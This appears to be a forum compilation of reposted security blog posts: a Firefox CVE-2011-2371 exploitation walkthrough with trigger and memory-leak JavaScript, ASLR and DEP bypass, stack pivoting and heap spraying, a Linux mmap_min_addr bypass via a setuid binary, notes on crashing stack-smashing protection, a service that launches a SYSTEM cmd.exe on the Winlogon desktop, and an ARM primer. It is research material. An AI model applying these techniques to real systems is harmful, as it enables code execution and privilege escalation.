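The closing advice of the int/float post (cast both sides to a wider type) can be sketched in a few lines. This is only an illustration under stated assumptions: int is at most 32 bits wide and double is the IEEE 754 64-bit type, so both conversions are exact. The function name is hypothetical.

```c
#include <stdbool.h>

/* Hypothetical helper: exact int == float comparison via double.
 * Assumes int has at most 32 value bits, so (double)i is exact;
 * (double)f is always exact because every float is also a double. */
bool int_float_equal_via_double(int i, float f) {
    return (double)i == (double)f;   /* NaN and infinities compare unequal */
}
```

With this helper, 100000001 is no longer considered equal to 100000000.0f, while 100000000 still is.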
  18. [h=2]Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules[/h]22/02/2012 pakt
CVE-2011-2371 (found by Chris Rohlf and Yan Ivnitskiy) is a bug in Firefox versions <= 4.0.1. It has the interesting property of being a code-exec and an info-leak bug at the same time. Unfortunately, all public exploits targeting this vulnerability rely on non-ASLR modules (like those present in Java). In this post I’ll show how to exploit this vulnerability on Firefox 4.0.1/Windows 7 by leaking the image base of one of Firefox’s modules, thus circumventing ASLR without any additional dependencies.
[h=2]The bug[/h]
You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger:
xyz = new Array;
xyz.length = 0x80100000;
a = function foo(prev, current, index, array) {
    current[0] = 0x41424344;
}
xyz.reduceRight(a,1,2,3);
Executing it crashes Firefox:
eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208
eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
mozjs!JS_FreeArenaPool+0x15e1:
004f0be1 8b14c8 mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=????????
eax holds a pointer to the “xyz” array and ecx is equal to xyz.length-1. reduceRight visits all elements of the given array in reverse order, so if the read @ 004f0be1 succeeds and we don’t crash inside the callback function (foo), the JS interpreter will loop the above code with decreasing values in ecx. The value read @ 004f0be1 is passed to foo() as the “current” argument. This means we can trick the JS interpreter into passing random stuff from the heap to our javascript callback. Notice we fully control the array’s length, and since ecx is multiplied by 8 (bitshifted left by 3 bits), we can access memory before or after the array, by setting/clearing the 29th bit of length. Neat.
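The address arithmetic in the crash dump above can be reproduced with a small sketch. It only models the 32-bit wrap-around of `[eax+ecx*8]`; the function name is made up for this illustration.

```c
#include <stdint.h>

/* Hypothetical model of the address used by
 * `mov edx, dword ptr [eax+ecx*8]` on 32-bit x86.
 * The top three bits of the index are discarded by the
 * multiplication, because the result wraps modulo 2^32. */
uint32_t element_address(uint32_t array_base, uint32_t index) {
    return array_base + index * 8u;
}
```

Feeding it the register values from the dump (eax=0454f230, ecx=800fffff) gives 04d4f228, the faulting address shown by the debugger.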
During reduceRight(), the interpreter expects jsval_layout unions:
http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
typedef union jsval_layout
{
    uint64 asBits;
    struct {
        union {
            int32 i32;
            uint32 u32;
            JSBool boo;
            JSString *str;
            JSObject *obj;
            void *ptr;
            JSWhyMagic why;
            jsuword word;
        } payload;
        JSValueTag tag;
    } s;
    double asDouble;
    void *asPtr;
} jsval_layout;
To be more specific, we are interested in the “payload” union. Possible values for “tag” are:
http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
JS_ENUM_HEADER(JSValueType, uint8)
{
    JSVAL_TYPE_DOUBLE = 0x00,
    JSVAL_TYPE_INT32 = 0x01,
    JSVAL_TYPE_UNDEFINED = 0x02,
    JSVAL_TYPE_BOOLEAN = 0x03,
    JSVAL_TYPE_MAGIC = 0x04,
    JSVAL_TYPE_STRING = 0x05,
    JSVAL_TYPE_NULL = 0x06,
    JSVAL_TYPE_OBJECT = 0x07,
...
JS_ENUM_HEADER(JSValueTag, uint32)
{
    JSVAL_TAG_CLEAR = 0xFFFF0000,
    JSVAL_TAG_INT32 = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32,
    JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED,
    JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING,
    JSVAL_TAG_BOOLEAN = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN,
    JSVAL_TAG_MAGIC = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC,
    JSVAL_TAG_NULL = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL,
    JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT
} JS_ENUM_FOOTER(JSValueTag);
Does it mean we can only read first dwords of pairs (d1,d2), where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no.
Observe how the interpreter checks if a jsval_layout is a number:
http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
static JS_ALWAYS_INLINE JSBool
JSVAL_IS_NUMBER_IMPL(jsval_layout l)
{
    JSValueTag tag = l.s.tag;
    JS_ASSERT(tag != JSVAL_TAG_CLEAR);
    return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET;
}
So any pair of dwords (d1, d2), with d2<=JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number. This isn’t the end of the good news, check how doubles are recognized:
http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h
static JS_ALWAYS_INLINE JSBool
JSVAL_IS_DOUBLE_IMPL(jsval_layout l)
{
    return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR;
}
This means that any pair (d1,d2) with d2<=0xffff0000 is interpreted as a double-precision floating point number. It’s a clever way of saving space, since doubles with all bits of the exponent set and a nonzero mantissa are NaNs anyway, so rejecting doubles whose bit pattern is greater than 0xffff000000000000 isn’t really a problem: we are just throwing out NaNs.
[h=2]Leaking the image base[/h]
Knowing that most of the values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them to byte sequences.
var leak_func = function bleh(prev, current, index, array) {
    if(typeof current == "number"){
        mem.push(current); //decode with JSPack later
    }
    count += 1;
    if(count>=CHUNK_SIZE/8){
        throw "lol"; //stop dumping
    }
}
Notice that we are verifying the type of “current”. It’s necessary because if we encounter a jsval_layout of type OBJECT, manipulating it later will cause an undesired crash. Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (that’s the module implementing reduceRight). Good candidates are pointers to functions in .code section, or pointers to data structures in .data, but how to find them?
After all, they change with every run, because of the varying image base. By examining dumped memory manually, I noticed it’s always possible to find a pair of pointers (with fixed RVAs) to the .data section, differing by a constant (0x304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0x304 and use their (known) RVAs to calculate mozjs’ image base (image_base = ptr_va - ptr_rva). It’s a heuristic, but it works 100% of the time.
[h=2]Taking control[/h]
Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here’s what happens after executing “current[0]=1” if the “payload.ptr” field points to an area filled with \x88:
eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888
eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0 ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06
mozjs!js::mjit::stubs::SetElem<0>+0xf9:
655301a9 8b4764 mov eax,dword ptr [edi+64h] ds:002b:888888ec=????????
0:000> k
ChildEBP RetAddr
0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567]
0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619]
0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857]
0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932]
We are using \x88 as a filler, so that every pointer taken from that area is equal to 0x88888888. Since the highest bit is set (and the pointer points to kernel space), every dereference will cause a crash and we will notice it under a debugger. Using low values, like 0x0c, as a filler during exploit development can make us miss crashes, if 0x0c0c0c0c happens to be mapped. It seems like we can control the value of edi.
Let’s see if it’s of any use:
0:000> u eip l10
mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]:
655301a9 8b4764 mov eax,dword ptr [edi+64h]
655301ac 85c0 test eax,eax
655301ae 7505 jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5)
655301b0 b830bb4965 mov eax,offset mozjs!js_SetProperty (6549bb30)
655301b5 8b54241c mov edx,dword ptr [esp+1Ch]
655301b9 6a00 push 0
655301bb 8d4c2424 lea ecx,[esp+24h]
655301bf 51 push ecx
655301c0 53 push ebx
655301c1 55 push ebp
655301c2 52 push edx
655301c3 ffd0 call eax
655301c5 83c414 add esp,14h
655301c8 85c0 test eax,eax
That’s exactly what we need: the value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3. Where does the edi value come from?
0:000> u eip-72 l10
mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]:
65530137 8b7d04 mov edi,dword ptr [ebp+4]
6553013a 81ffb05f5e65 cmp edi,offset mozjs!js_ArrayClass (655e5fb0)
65530140 8b5c2414 mov ebx,dword ptr [esp+14h]
65530144 7563 jne mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9)
edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union. It’s now easy to see how to control EIP. Trigger SetElem on a controlled jsval_layout union (by executing “current[0]=1” in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT and ptr=PTR_TO_CONTROLLED_MEM, where the dword at [CONTROLLED_MEM+4] is loaded into edi and the dword at [edi+64h] becomes NEW_EIP. Easy.
Since ASLR is not an issue (we already have mozjs’ image base) we can circumvent DEP with return oriented programming. With mona.py it’s very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk, we can run our “normal” shellcode, without worrying about DEP.
!mona rop -m "mozjs" -rva
“-m” restricts the search to just mozjs.dll (that’s the only module with a known image base)
“-rva” generates a chain parametrized by the module’s image base.
I won’t paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX.
There’s only one problem. In order to use that chain, we need to control the stack. During the call @ 655301c3, we don’t. Fortunately, we do control EBP, which is equal to layout.ptr field in our fake object. First idea is to use any function’s epilogue: mov esp, ebp pop ebp ret as a pivot, but notice that RET will transfer control to an address stored in [ebp+4], and since: 65530137 8b7d04 mov edi,dword ptr [ebp+4] that would mean [ebp+4] has to be a return address and a pointer to a function pointer called later @ 655301c3. We have to modify EBP before copying it to ESP. Noticing that during SetElem, property’s id is passed in EBX as 2*id+1 (when executing “current[id] = …”), it’s easy to pick a good gadget: // 0x68e7a21c, mozjs.dll // found with mona.py ADD EBP,EBX PUSH DS POP EDI POP ESI POP EBX MOV ESP,EBP //(1) POP EBP //(2) RETN This will offset EBP by a controlled ODD value. Unicode chars in JS have two byte chars, so it’s better to have EBP aligned to 2. We can realign ESP by pivoting again with new EBP value popped @ (2) and executing the same gadget from line (1). This is how our fake object has to look like: +------------+ | | 9 13 17 v------------+----------------------------------------------------------------------+ |pivot_va | ptr | 00,new_ebp,mov_esp_ebp,00 | new_ebp2 | ROP ... normal shellcode ... 
+-----------------------+-----------------------------------------------------------+ 0 4 8 | 18 22 | ^ | | +-------------------+ pivot_va – address of the gadget above new_ebp – value popped at (2) used to realign the stack to 2 mov_esp_ebp – address of (1) new_ebp2 – new value of EBP after executing (2) for the second time, not used ROP – generated ROP chain changing memory perms normal shellcode – message box shellcode by Skylined [h=2]Spraying[/h] Here’s a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory: low addresses +---------------------+ +-------+ ptr | 0xffff0007 | ^ | +---------------------| | | | | | | | . | | | | . | | | | . | | | +---------------------| | half1 | +----+ ptr | 0xffff0007 | | | | +---------------------| | | | | . | | | | | . | | | | | . | | | | | | v | | +-----end of half1----+ | | | | ^ | | | | | | | | | | margin of | | | . | | error | | | . | | | | +---------------------+ v +--|---> fake object | | +--^------------------+ | | | . | | | | . | +-----+ | | | | | +---------------------+ high addresses Our spray will consist of two regions. First one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, filled with fake objects described above. If you run the PoC exploit on Windows XP, this is how (most likely) the heap is going to look like: Zooming into of the 1MB chunks: Notice how our payload is aligned to 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. Beginning of the array is used to store metadata, and the actual data starts @ +4KB. 
It’s also useful to note that older versions of FF have a bug related to rounding allocation sizes and, in effect, allocating too much memory for objects (including strings), so instead of nicely aligned strings in the array, we will get strings interleaved with chunks containing NULL bytes (I’ll explain why this isn’t a problem in a sec.). This is how the fake objects from the second part of the spray look: Four NOPs at the bottom mark the end of mona’s ROP chain.
[h=2]Putting it all together[/h]
1. Leak mozjs’ image base, as described above.
2. Spray the heap with JS, as described above. Note where the spray starts in memory, across different OSes. Different versions of the exploit should use OS-specific constants for calculating the array’s length used in reduceRight().
3. Calculate the length of the array (xyz in the trigger PoC) so that the first dereference happens in the middle of the first half of the spray. Aiming at the middle gives us the biggest possible margin of error: if the spray’s starting address deviates from the expected value by less than size/2, it shouldn’t affect our exploit.
4. Trigger the bug.
5. Inside the JS callback, trigger SetElem by executing “current[4]=1”. In case of a JS exception (TypeError: current is undefined), change the array’s length and continue. These exceptions are caused by NULL areas between strings. Encountering them isn’t fatal, because the JS interpreter sees them as “undefined” values and throws us a JS exception, instead of crashing.
6. See a nice messagebox, confirming success.
[h=2]Limitations[/h]
The PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common “use-case” is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already opened. In that situation our spray probably won’t be a continuous chunk of memory, which will lead to problems (crashes).
Assuming that the PoC is the first and only page opened in Firefox, probability of success (running shellcode) depends on how long we need to search for mozjs’ image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more “discontinuities” in the spray region. Get the PoC here. Sursa: Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules | GDTR
  19. [h=3]Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)[/h]
EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel.
EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable.
EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895
NULL pointer dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segments both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy.
This used to not be the case, back in Linux 2.0 when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitly use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand down segment instead of a PAGE_OFFSET segment base, but that's a detail).
Kernel developers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross-architecture) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at.
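The effect of vm.mmap_min_addr can be observed from an unprivileged process with a small probe. This is a minimal sketch, assuming a Linux system with glibc; the function name is made up for this illustration, and the result depends on the sysctl value and on the capabilities of the calling process.

```c
#define _DEFAULT_SOURCE
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical probe: returns 1 if an anonymous page could be mapped at
 * address 0, and 0 if the kernel refused the request. */
int can_map_page_zero(void) {
    long page = sysconf(_SC_PAGESIZE);
    /* MAP_FIXED asks for exactly address 0 instead of treating it as a hint */
    void *p = mmap((void *)0, (size_t)page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED) {
        return 0;   /* refused, as expected when mmap_min_addr is non-zero */
    }
    munmap(p, (size_t)page);
    return 1;
}
```

On a system where the protection is active and the process has no special capability, the probe is expected to return 0.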
Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible.
Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as:
- using brk()
- creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region
- obscure system calls such as remap_file_pages
- putting memory pressure in the address space to let the kernel allocate in this region
- using the MMAP_PAGE_ZERO personality
All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel):
if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO))
    return -EACCES;
return 0;
Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back? Using something such as "/bin/su our_user_name" could be tempting, but while this would indeed give us control back, su will drop privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio.
pulseaudio will drop privileges and let you specify a library to load through its -L argument. Exactly what we needed! Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection.
Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask, and thus is allowed when executing setuid binaries, can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content, could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask.
PS: Thanks to Robert Swiecki for some help while investigating this.
Posted by Julien Tinnes at 11:37 AM
Sursa: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
  20. [h=1]Adventure with Stack Smashing Protector (SSP)[/h] by pi3
Introduction.
I was heavily playing with Stack Smashing Protector a few years ago. I decided to publish some of my research (observations) in Phrack magazine, but not everything. Two years ago my professional life moved to the Windows environment and unfortunately I didn’t have time to play with the UNIX world as much as before. One weekend I decided to reanalyze the SSP code again, and this write-up describes a few of the observations I made during that work…
… which can be shortly summarized as:
Not security related…
1. We can change the program’s name (from SSP’s perspective) via overwriting the memory region where the pointer to “argv[0]” points to.
2. We can crash the Stack Smashing Protector code in many ways:
   a. Via corrupting the memory region pointed to by the “__environ” variable.
   b. Via setting “LIBC_FATAL_STDERR_” to the edge of valid addresses.
   c. Via forcing “alloca()” to fail – e.g. stack exhaustion.
   d. There is one more bug which I’m analyzing more comprehensively at point 4. It may indirectly force SSP to crash. It exists in the DWARF stack (state) machine which is responsible for gathering information about the stack trace (“__backtrace()”) and prints it.
3. We can slightly control SSP’s execution flow. (Un)Fortunately it doesn’t have any influence on the main execution (what about security?). The following scenarios are possible:
   a. Force SSP to open “/dev/tty”
   b. Force SSP not to open “/dev/tty” and assign to the “fd” descriptor the “STDERR_FILENO” value: #define STDERR_FILENO 2 /* Standard error output. */
   c. Crash SSP via the 2b. scenario
4. We can indirectly crash SSP via the unwinding algorithm (read-AV, or we can be killed by the “gcc_unreachable” or “gcc_assert” function) – DWARF stack (state) machine:
   a. Simulate FDE object was not found
   b. Simulate FDE object was found.
Somehow security related…
1. We can force SSP to allocate a lot of memory and cause Denial of Service via a Resource Exhaustion attack.
2. Theoretical Information leak:
   a. Stack cookie information leak.
   b. Any kind of information leak
   c. File corruption.
Full write-up is available here
Best regards, Adam ‘pi3’ Zabrocki
Sursa: Adventure with Stack Smashing Protector (SSP) : pi3 blog
  21. [h=2]Running processes on the Winlogon desktop[/h] Disclaimer: this is a Bad Idea unless you know exactly what you’re doing, why you’re doing it and there are no alternatives. Please use responsibly. There may be circumstances where you’d like to programmatically interact with the Winlogon desktop (the one that houses the LogonUI process responsible for displaying logon tiles and the rest of, well, logon UI). Test automation, seamless VM integration, whatever. It’s not easy though, and for good reasons:
The logon desktop created by Winlogon has an ACL that only grants access to the SYSTEM account, so we need a service to access it. Changing that ACL to allow other accounts is a very bad idea.
When a user chooses “Switch user” from the Start Menu, or when the system first boots and displays the logon UI, it’s all done in a separate session. If a new user logs on, the Winlogon session is reused for that user’s interactive logon. If there is no new logon (a user switch or unlocking a locked session, for example), the Winlogon session is destroyed.
(Figure: temporary processes in a Winlogon session after locking/unlocking a user session.)
So, our service needs to monitor session changes and act when a Winlogon session is created (and made interactive). The code below demonstrates how you can create a process that runs on the Winlogon desktop and can interact with it.
#include <windows.h>
#include "log.h"

#define SERVICE_NAME TEXT("QTestService")

SERVICE_STATUS g_Status;
SERVICE_STATUS_HANDLE g_StatusHandle;
HANDLE g_ConsoleEvent;
DWORD g_TargetSessionId;

void ServiceMain(int argc, TCHAR *argv[]);
DWORD ControlHandlerEx(DWORD controlCode, DWORD eventType, void *eventData, void *context);

// Names indexed by the WTS_* session event code, used only for logging.
WCHAR *g_SessionEventName[] = {
    L"<invalid>",
    L"WTS_CONSOLE_CONNECT",
    L"WTS_CONSOLE_DISCONNECT",
    L"WTS_REMOTE_CONNECT",
    L"WTS_REMOTE_DISCONNECT",
    L"WTS_SESSION_LOGON",
    L"WTS_SESSION_LOGOFF",
    L"WTS_SESSION_LOCK",
    L"WTS_SESSION_UNLOCK",
    L"WTS_SESSION_REMOTE_CONTROL",
    L"WTS_SESSION_CREATE",
    L"WTS_SESSION_TERMINATE"
};

// Entry point.
int main(int argc, TCHAR *argv[])
{
    SERVICE_TABLE_ENTRY serviceTable[] = {
        {SERVICE_NAME, ServiceMain},
        {NULL, NULL}
    };

    log_init(NULL, TEXT("qservice"));
    logf("main: start");
    StartServiceCtrlDispatcher(serviceTable);
    logf("main: end");
}

DWORD WINAPI WorkerThread(void *param)
{
    TCHAR *cmdline;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    HANDLE newToken;
    DWORD sessionId;
    DWORD size;
    HANDLE currentToken;
    HANDLE currentProcess = GetCurrentProcess();

    cmdline = (TCHAR*) param;

    // Wait until the interactive session changes (to winlogon console).
    WaitForSingleObject(g_ConsoleEvent, INFINITE);

    // Get access token from ourselves.
    OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken);

    // Session ID is stored in the access token. For services it's normally 0.
    GetTokenInformation(currentToken, TokenSessionId, &sessionId, sizeof(sessionId), &size);
    logf("current session: %d", sessionId);

    // We need to create a primary token for CreateProcessAsUser.
    if (!DuplicateTokenEx(currentToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &newToken))
    {
        perror("DuplicateToken");
        return GetLastError();
    }

    CloseHandle(currentProcess);

    // g_TargetSessionId is set by SessionChange() handler after a WTS_CONSOLE_CONNECT event.
    // Its value is the new console session ID. In our case it's the "logon screen".
    sessionId = g_TargetSessionId;
    logf("Running process '%s' in session %d", cmdline, sessionId);

    // Change the session ID in the new access token to the target session ID.
    // This requires SeTcbPrivilege, but we're running as SYSTEM and have it.
    if (!SetTokenInformation(newToken, TokenSessionId, &sessionId, sizeof(sessionId)))
    {
        perror("SetTokenInformation(TokenSessionId)");
        return GetLastError();
    }

    // Create process with the new token.
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    // Don't forget to set the correct desktop.
    si.lpDesktop = TEXT("WinSta0\\Winlogon");

    // The last argument receives the new process and thread handles.
    if (!CreateProcessAsUser(newToken, 0, cmdline, 0, 0, 0, 0, 0, 0, &si, &pi))
    {
        perror("CreateProcessAsUser");
        return GetLastError();
    }

    return ERROR_SUCCESS;
}

void ServiceMain(int argc, TCHAR *argv[])
{
    TCHAR *cmdline = TEXT("cmd.exe");
    HANDLE workerHandle;

    logf("ServiceMain: start");
    g_Status.dwServiceType = SERVICE_WIN32;
    g_Status.dwCurrentState = SERVICE_START_PENDING;
    // SERVICE_ACCEPT_SESSIONCHANGE allows us to receive session change notifications.
    g_Status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_SESSIONCHANGE;
    g_Status.dwWin32ExitCode = 0;
    g_Status.dwServiceSpecificExitCode = 0;
    g_Status.dwCheckPoint = 0;
    g_Status.dwWaitHint = 0;

    g_StatusHandle = RegisterServiceCtrlHandlerEx(SERVICE_NAME, ControlHandlerEx, NULL);
    if (g_StatusHandle == 0)
    {
        perror("RegisterServiceCtrlHandlerEx");
        goto stop;
    }

    g_Status.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(g_StatusHandle, &g_Status);

    // Create trigger event for the worker thread.
    g_ConsoleEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

    // Start the worker thread.
    logf("Starting worker thread");
    workerHandle = CreateThread(NULL, 0, WorkerThread, cmdline, 0, NULL);
    if (!workerHandle)
    {
        perror("CreateThread");
        goto stop;
    }

    // Wait for the worker thread to exit.
    WaitForSingleObject(workerHandle, INFINITE);

stop:
    logf("exiting");
    g_Status.dwCurrentState = SERVICE_STOPPED;
    g_Status.dwWin32ExitCode = GetLastError();
    SetServiceStatus(g_StatusHandle, &g_Status);

    logf("ServiceMain: end");
    return;
}

void SessionChange(DWORD eventType, WTSSESSION_NOTIFICATION *sn)
{
    if (eventType < RTL_NUMBER_OF(g_SessionEventName))
        logf("SessionChange: %s, session ID %d", g_SessionEventName[eventType], sn->dwSessionId);
    else
        logf("SessionChange: <unknown event: %d>, session id %d", eventType, sn->dwSessionId);

    if (eventType == WTS_CONSOLE_CONNECT)
    {
        // Store the new session ID for the worker thread and signal the trigger event.
        g_TargetSessionId = sn->dwSessionId;
        SetEvent(g_ConsoleEvent);
    }
}

DWORD ControlHandlerEx(DWORD control, DWORD eventType, void *eventData, void *context)
{
    switch(control)
    {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        g_Status.dwWin32ExitCode = 0;
        g_Status.dwCurrentState = SERVICE_STOPPED;
        logf("stopping...");
        SetServiceStatus(g_StatusHandle, &g_Status);
        break;

    case SERVICE_CONTROL_SESSIONCHANGE:
        SessionChange(eventType, (WTSSESSION_NOTIFICATION*) eventData);
        break;

    default:
        logf("ControlHandlerEx: code 0x%x, event 0x%x", control, eventType);
        break;
    }

    return ERROR_SUCCESS;
}

You can install the service using the following command (mind the spaces):
C:\>sc create QTestService binPath= d:\test\QService.exe type= own start= demand
[SC] CreateService SUCCESS
Then start it with:
sc start QTestService
After starting, choose “Switch user” or “Lock” from the Start Menu. You should see a console window on the logon screen. ~ by omeg on January 29, 2014. Source: » Running processes on the Winlogon desktop - Spinning mirrors
  22. [h=3]Understanding ARM Assembly Part 1[/h]ntdebug 22 Nov 2013 3:38 PM My name is Marion Cole, and I am a Sr. EE in Microsoft Platforms Serviceability group. You may be wondering why Microsoft support would need to know ARM assembly. Doesn’t Windows only run on x86 and x64 machines? No. Windows has run on a variety of processors in the past. Those include i860, Alpha, MIPS, Fairchild Clipper, PowerPC, Itanium, SPARC, 286, 386, IA-32, x86, x64, and the newest one is ARM. Most of these processors are antiquated now. The common ones now are IA-32, x86, x64. However, Windows has started supporting ARM processors in order to jump into the portable devices arena. You will find them in the Microsoft Surface RT, Windows Phones, and other things in the future I am sure. So you may be saying that these devices are locked and cannot be debugged. That is true from a live debug perspective, but you can get memory dumps and application dumps from them, and those can be debugged. Processor There are limitations on the ARM processors that Windows supports. There are 3 System on Chip (SOC) vendors that are supported: nVidia, Texas-Instruments, and Qualcomm. Windows only supports the ARMv7 (Cortex, Scorpion) architecture in ARMv7-A (Application Profile) mode. This implements a traditional ARM architecture with multiple modes and supports a Virtual Memory System Architecture (VMSA) based on an MMU. It supports the ARM and Thumb-2 instruction sets, which allows for a mixture of 16-bit (Thumb) and 32-bit (ARM) opcodes, so it will look strange in the assembly. Luckily the debuggers know this and handle it for you. This also helps to shrink the size of the assembly code in memory. The processor also has to have the optional ISA extensions of VFP (Hardware Floating Point) and NEON (128-bit SIMD Architecture). In order to understand the assembly that you will see, you need to understand the processor internals.
ARM is a Reduced Instruction Set Computer (RISC), much like some of the previous processors that Windows ran on. It is a 32-bit load/store style processor. It has a “weakly-ordered” memory model, similar to Alpha and IA64, and it requires specific memory barriers to enforce ordering. On ARM devices these are the ISB, DSB, and DMB instructions. Registers The processor has 16 available registers, r0 – r15.
0: kd> r
r0=00000001 r1=00000000 r2=00000000 r3=00000000 r4=e1820044 r5=e17d0580
r6=00000001 r7=e17f89b9 r8=00000002 r9=00000000 r10=1afc38ec r11=e1263b78
r12=e127813c sp=e1263b20 lr=e16c12c3 pc=e178b6d0 psr=00000173 ----- Thumb
r0, r1, r2, r3, and r12 are volatile registers. Volatile registers are scratch registers presumed by the caller to be destroyed across a call. Nonvolatile registers are required to retain their values across a function call and must be saved by the callee if used. On Windows the following registers have a designated purpose:
PC (r15) – Program Counter (EIP on x86).
LR (r14) – Link Register. Used as a return address to the caller.
SP (r13) – Stack Pointer (ESP on x86).
